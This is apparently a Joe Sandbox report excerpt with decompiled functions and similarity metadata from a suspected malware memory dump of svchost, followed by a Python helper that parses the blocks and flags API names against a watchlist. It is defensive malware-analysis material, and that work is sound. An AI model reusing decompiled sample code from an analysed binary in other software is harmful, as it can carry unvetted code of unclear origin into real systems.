                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExecuteShellSleep
                                                            • String ID: open
                                                            • API String ID: 4194306370-2758837156
                                                            • Opcode ID: 19b618c6e987b621b7023be04189832c73580cc368628f748922581f1536daea
                                                            • Instruction ID: a6cfb0a4946374448fab74c4545e35b70865a67827ac3bbb70d35297cad0a1d6
                                                            • Opcode Fuzzy Hash: 19b618c6e987b621b7023be04189832c73580cc368628f748922581f1536daea
                                                            • Instruction Fuzzy Hash: 24419E73A1065091DB768B6AC14D76C7BF2F788F89F658115CA0803BAADF3BC842CB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID: @
                                                            • API String ID: 3000768030-2766056989
                                                            • Opcode ID: 0f4aef228be69e172ae416511e9806d5c0d4549bee0373b76541760fbcab3704
                                                            • Instruction ID: c3c87713042489c1957615b32939dab8f0adc045cb5f40c89d80a394883d486c
                                                            • Opcode Fuzzy Hash: 0f4aef228be69e172ae416511e9806d5c0d4549bee0373b76541760fbcab3704
                                                            • Instruction Fuzzy Hash: 1F21E423E04B5050EF768B65949C2A8B792F745B74F2A1706D6AB077D6EF36C881C341
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF540A30(long long __rbx, intOrPtr* __rcx, long long _a8) {
                                                            				void* _t13;
                                                            
                                                            				_a8 = __rbx;
                                                            				if ( *__rcx != 0) goto 0xaf540a58;
                                                            				 *((intOrPtr*)(__rcx + 0x44)) = 0;
                                                            				_t3 = _t13 + 1; // 0x1
                                                            				return _t3;
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait
                                                            • String ID: stop
                                                            • API String ID: 528846559-3109426870
                                                            • Opcode ID: ed094be8e1d8f543187a9199dca0b8fa8d8bc45c90499c530f4b7d04cc568f2e
                                                            • Instruction ID: 80474075e07656471ab58f41daa7cfb4f3bab5a3c0405e1cc84f9d2d096d1475
                                                            • Opcode Fuzzy Hash: ed094be8e1d8f543187a9199dca0b8fa8d8bc45c90499c530f4b7d04cc568f2e
                                                            • Instruction Fuzzy Hash: 5A1151336016009AEF66CF9AE55C39877E1EB88B98F285515DA1D47796EF3AC481C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0000022B22BAF56FC4C(void* __eflags, long long* __rax, long long __rbx, void* __rcx, long long _a8) {
                                                            				void* _t4;
                                                            				long long* _t8;
                                                            				void* _t18;
                                                            
                                                            				_t8 = __rax;
                                                            				_a8 = __rbx;
                                                            				E0000022B22BAF56F93C(0xf, __rcx, "GetSystemTimePreciseAsFileTime", _t18, "\t", "GetSystemTimePreciseAsFileTime");
                                                            				if (_t8 == 0) goto 0xaf56fc90;
                                                            				E0000022B22BAF57BC88();
                                                            				_t4 =  *_t8();
                                                            				goto 0xaf56fc99;
                                                            				GetSystemTimeAsFileTime(??);
                                                            				return _t4;
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$FileSystem
                                                            • String ID: .exe$GetSystemTimePreciseAsFileTime
                                                            • API String ID: 2086374402-666196055
                                                            • Opcode ID: 1885f2c5727bae0480385e8a400f87ee5cfadcaa6b150fcb2e7c33bd803b9c5e
                                                            • Instruction ID: 163c2d66392a14cd51ebe49d322d304760fb21870917c72c669a7e2fd97e1080
                                                            • Opcode Fuzzy Hash: 1885f2c5727bae0480385e8a400f87ee5cfadcaa6b150fcb2e7c33bd803b9c5e
                                                            • Instruction Fuzzy Hash: 53F06522A14B46B1FE669BD6F80C2F83390AB44BC0F4854319D160675BEF39C4449380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileMovelstrlen
                                                            • String ID: r
                                                            • API String ID: 3773443382-1812594589
                                                            • Opcode ID: 8a35fc9d402d0e343fb9d254ae2f6c619980153bb64365810d880690ea30e486
                                                            • Instruction ID: b90422518d6687850ac7d3a97a2778a421f0eb2e0101e2758caac76e7f02ef73
                                                            • Opcode Fuzzy Hash: 8a35fc9d402d0e343fb9d254ae2f6c619980153bb64365810d880690ea30e486
                                                            • Instruction Fuzzy Hash: D7E09262704A80A2DB119F19E04C2D9B771F785BC5F584521DB490762AEF7EC1948710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 40%
                                                            			E0000022B22BAF55B394(void* __eflags, void* __rax) {
                                                            				char _v40;
                                                            				void* _t6;
                                                            				void* _t9;
                                                            				void* _t13;
                                                            				char* _t15;
                                                            				void* _t17;
                                                            
                                                            				E0000022B22BAF55B308(__rax,  &_v40);
                                                            				_t15 =  &_v40;
                                                            				_t6 = E0000022B22BAF563744(_t13, _t15, 0xaf5921f8, _t17);
                                                            				asm("int3");
                                                            				_t12 =  !=  ?  *((void*)(_t15 + 8)) : "Unknown exception";
                                                            				_t9 =  !=  ?  *((void*)(_t15 + 8)) : "Unknown exception";
                                                            				return _t6;
                                                            			}

                                                            Instruction addresses (disassembly text not captured): 0x22baf55b39d, 0x22baf55b3a9, 0x22baf55b3ae, 0x22baf55b3b3, 0x22baf55b3c0, 0x22baf55b3c5

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                            • String ID: Unknown exception
                                                            • API String ID: 3561508498-410509341
                                                            • Opcode ID: 0dba5c35c4838d5003245c0f8c01933027e72927b9035dea4e9d0a86b65c51a1
                                                            • Instruction ID: 65ef99f2cfd66ebaf7b998c2bbc460fbe207d3e08e538e6ac3afc5b6d8c142ad
                                                            • Opcode Fuzzy Hash: 0dba5c35c4838d5003245c0f8c01933027e72927b9035dea4e9d0a86b65c51a1
                                                            • Instruction Fuzzy Hash: 4AD05E23214A88B1DE21DB84D88C3C87330F780308F904412925C815B7DF3AC64BE740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0000022B22BAF552AF0(void* __ebp, void* __eflags, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rsi, long long __rbp, char _a8, long long _a16, long long _a24, long long _a32) {
                                                            				void* __rdi;
                                                            				void* _t28;
                                                            				void* _t41;
                                                            				intOrPtr* _t44;
                                                            
                                                            				_t46 = __rbp;
                                                            				_t28 = __rax;
                                                            				_a16 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_a32 = __rsi;
                                                            				_t44 = __rcx;
                                                            				_a8 = 0;
                                                            				_t30 = __rcx + 0x98;
                                                            				E0000022B22BAF551A10(__rcx + 0x98, __rcx, __rcx, __rbp);
                                                            				_t41 = _t28;
                                                            				if (_t28 == 0) goto 0xaf552b8c;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if (E0000022B22BAF552C30(_t30, _t44, _t41, _t41, _t44, _t46,  &_a8) == 0) goto 0xaf552c03;
                                                            				if (_a8 != 0) goto 0xaf552ba6;
                                                            				if (_t41 == 0) goto 0xaf552b75;
                                                            				if (E0000022B22BAF54FD40(_t30, _t30 + 0x30, _t41) != 0) goto 0xaf552b75;
                                                            				HeapFree(??, ??, ??);
                                                            				E0000022B22BAF551A10(_t44 + 0x98, _t44, _t44, _t46);
                                                            				if (_t28 != 0) goto 0xaf552b30;
                                                            				return 1;
                                                            			}

                                                            Instruction addresses (disassembly text not captured): 0x22baf552af0, 0x22baf552af5, 0x22baf552afa, 0x22baf552b04, 0x22baf552b07, 0x22baf552b0f, 0x22baf552b16, 0x22baf552b1b, 0x22baf552b21, 0x22baf552b27, 0x22baf552b42, 0x22baf552b4d, 0x22baf552b52, 0x22baf552b62, 0x22baf552b6f, 0x22baf552b7f, 0x22baf552b8a, 0x22baf552ba5

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                            • String ID:
                                                            • API String ID: 1701177279-0
                                                            • Opcode ID: 71c6565e52991c1ceb2f7f853c1f0e4a0813fade0213b6da4b33164cba8b6a2a
                                                            • Instruction ID: 816aaabf80b98f0c269d0f45a297d05cb7b298d37620e100d607e7d82be5af76
                                                            • Opcode Fuzzy Hash: 71c6565e52991c1ceb2f7f853c1f0e4a0813fade0213b6da4b33164cba8b6a2a
                                                            • Instruction Fuzzy Hash: 5D313933205A40A2EB668BA2E58C3EEB3A1F788BD4F444411DF5A47B97DF3AC555C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
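As an added triage example (this is not Joe Sandbox's code and not part of the report), the Python below parses per-function metadata blocks in the layout shown above: it splits the `$`-joined API ID fragments, separates the two numbers of the API String ID (assumed to be an API hash and a string hash, since the block with an empty String ID carries `...-0`), takes the process name from the tail of the Snapshot File name (an assumption), groups identical Opcode IDs across process dumps, and flags functions whose API fragments match a watchlist. The sample input is constructed from two of the blocks above; the watchlist and the names parse_blocks, triage and group_by_opcode are this example's own. When weighing the results, note that the first block's pattern (resolve GetSystemTimePreciseAsFileTime by name, fall back to GetSystemTimeAsFileTime when it is absent) is routinely emitted by compiler runtime libraries for pre-Windows 8 compatibility, so on its own it is a weak signal.

```python
"""Triage helper for Joe Sandbox per-function metadata blocks (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: two metadata blocks copied in the layout of the report.
SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: Time$FileSystem
• String ID: .exe$GetSystemTimePreciseAsFileTime
• API String ID: 2086374402-666196055
• Opcode ID: 1885f2c5727bae0480385e8a400f87ee5cfadcaa6b150fcb2e7c33bd803b9c5e
• Instruction ID: 163c2d66392a14cd51ebe49d322d304760fb21870917c72c669a7e2fd97e1080
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
• Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
• String ID:
• API String ID: 1701177279-0
• Opcode ID: 71c6565e52991c1ceb2f7f853c1f0e4a0813fade0213b6da4b33164cba8b6a2a
• Instruction ID: 816aaabf80b98f0c269d0f45a297d05cb7b298d37620e100d607e7d82be5af76
Uniqueness

Uniqueness Score: -1.00%
"""

# Bullet fields look like "• API ID: Time$FileSystem"; the key runs to the first colon.
FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")


@dataclass
class FunctionBlock:
    fields: dict = field(default_factory=dict)

    @property
    def api_tokens(self):
        """'$'-separated fragments of API names, e.g. FreeHeap, ErrorLastsend."""
        return [t for t in self.fields.get("API ID", "").split("$") if t]

    @property
    def string_tokens(self):
        return [t for t in self.fields.get("String ID", "").split("$") if t]

    @property
    def opcode_id(self):
        return self.fields.get("Opcode ID", "")

    @property
    def hashes(self):
        """(api_hash, string_hash). Assumption: the empty-String-ID block reads '...-0'."""
        a, _, s = self.fields.get("API String ID", "0-0").partition("-")
        return int(a), int(s)

    @property
    def process(self):
        """Assumption: the snapshot name ends in the image name (..._svchost.jbxd)."""
        snap = self.fields.get("Snapshot File", "")
        return snap.rsplit(".", 1)[0].rsplit("_", 1)[-1]


def parse_blocks(text):
    """One FunctionBlock per 'Uniqueness Score' terminator; empty blocks are dropped."""
    blocks, cur = [], FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m.group(1).strip()] = m.group(2).strip()
        elif line.startswith("Uniqueness Score"):
            if cur.fields:
                blocks.append(cur)
            cur = FunctionBlock()
    return blocks


# Example watchlist: substrings of API fragments worth a closer look (case-insensitive).
WATCHLIST = ("send", "recv", "Heap", "Move", "Thread", "Process", "Crypt", "Registry")


def triage(blocks, watch=WATCHLIST):
    """Opcode ID -> sorted watchlist words found among that function's API tokens."""
    hits = {}
    for b in blocks:
        matched = sorted({w for w in watch for t in b.api_tokens if w.lower() in t.lower()})
        if matched:
            hits[b.opcode_id] = matched
    return hits


def group_by_opcode(blocks):
    """Opcode ID -> processes whose dumps hold that function (same code injected into each)."""
    groups = {}
    for b in blocks:
        groups.setdefault(b.opcode_id, []).append(b.process)
    return groups


if __name__ == "__main__":
    for oid, words in triage(parse_blocks(SAMPLE)).items():
        print(oid[:16], words)
```

Feed it the text of the whole report section rather than the constructed sample to rank every dumped function by watchlist hits, and use group_by_opcode to collapse the same function seen in several injected processes into one entry.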